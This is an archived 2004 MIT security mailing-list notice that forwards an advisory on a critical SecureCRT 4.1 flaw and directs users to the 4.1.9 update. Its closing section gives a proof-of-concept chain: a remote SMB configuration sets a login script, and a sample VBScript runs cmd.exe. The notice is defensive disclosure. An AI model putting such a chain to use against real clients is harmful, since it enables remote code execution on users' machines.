[261] in Security FYI
[Security-fyi]
daemon@ATHENA.MIT.EDU (Mark Van Dyke)
Thu Dec 2 13:00:56 2004
Mime-Version: 1.0 (Apple Message framework v619)
Content-Type: text/plain; charset=US-ASCII; format=flowed
Message-Id: <F07A7E90-448A-11D9-925B-003065D63F3A@mit.edu>
Content-Transfer-Encoding: 7bit
From: Mark Van Dyke <mvan@mit.edu>
Date: Thu, 2 Dec 2004 12:52:31 -0500
To: security-fyi@mit.edu
cc: Software Release Team <swrt@mit.edu>
cc: itss@mit.edu
Errors-To: security-fyi-bounces@mit.edu
Greetings,
Please be aware of the following security threat concerning SecureCRT
V4.1 and earlier, and see below for further details:
=============================================================
Date: November 23, 2004
Advisory: NTBugtraq Advisory
Affected: SecureCRT V4.1, V4.0 (and probably lower)
Impact: All Windows platforms using SecureCRT -- Critical
Action to Take: Update to Secure CRT V4.1.9
=============================================================
You can download Secure CRT V4.1.9 from the MIT IS&T Windows Software
Site: https://web.mit.edu/software/win.html. Please note that you need
a current personal certificate to download this software. If you do not
have a current personal certificate, then you can obtain one from
https://ca.mit.edu/.
Notable Features of SecureCRT V4.1.9:
------------------------------
- Includes 4.1.9 binaries
- Adds path to VSH and VCP to PATH variable (for users who would like
to use the command line)
- First-time users (i.e. anyone but the account that installed
SecureCRT) will only see a quick, one-time repair that doesn't require
the installer to be on the user's system
- New "Create Athena Shortcut" item in the SecureCRT Program Files
folder will create (and ask to overwrite if it exists) a shortcut to
Athena. This is instead of creating a shortcut via repair. Only the
installing account will have this shortcut automatically.
- Running the "Create Athena Shortcut" item will allow the user to
create a GSSAPI (Kerberos Tickets) shortcut to Athena if they prefer
(click Options... button)
Known Issues:
-------------
There are no known issues for this version of SecureCRT 4.1.9.
How to Obtain:
--------------
You can download Secure CRT V4.1.9 from the MIT IS&T Windows Software
Site: https://web.mit.edu/software/win.html. Please note that you need
a current personal certificate to download this software. If you do not
have a current personal certificate, then you can obtain one from
https://ca.mit.edu/.
Getting Help:
-------------
If you have a question or need assistance, please contact the Computing
Help Desk at computing-help@mit.edu or x3-1101.
Further Details on the Exploit:
--------------
There appears to be some filtering around the use of \ in the
url->command line parsing, that prevents the specification of an SMB
share to use for configuration. This can be easily bypassed and leads
to the loading of a configuration file from a remote site.
The configuration file contains an entry that specifies the login
script to run which can be set a file on the the remote share;
S:"Script Filename"=\\ipofshare\share\folder\scriptname
And the login script can then contain scripting such as;
# $language = "VBScript"
# $interface = "1.0"
Sub Main
dim wshShell, boolErr, strErrDesc
Set wshShell = CreateObject("WScript.Shell")
run = wshShell.Run ("cmd.exe /c dir >c:\shell.txt",0,True)
End Sub
Mark Van Dyke
IT Security Support
MIT Information Services & Technology
mvan@mit.edu
_______________________________________________
Security-fyi mailing list
Security-fyi@mit.edu
http://mailman.mit.edu/mailman/listinfo/security-fyi
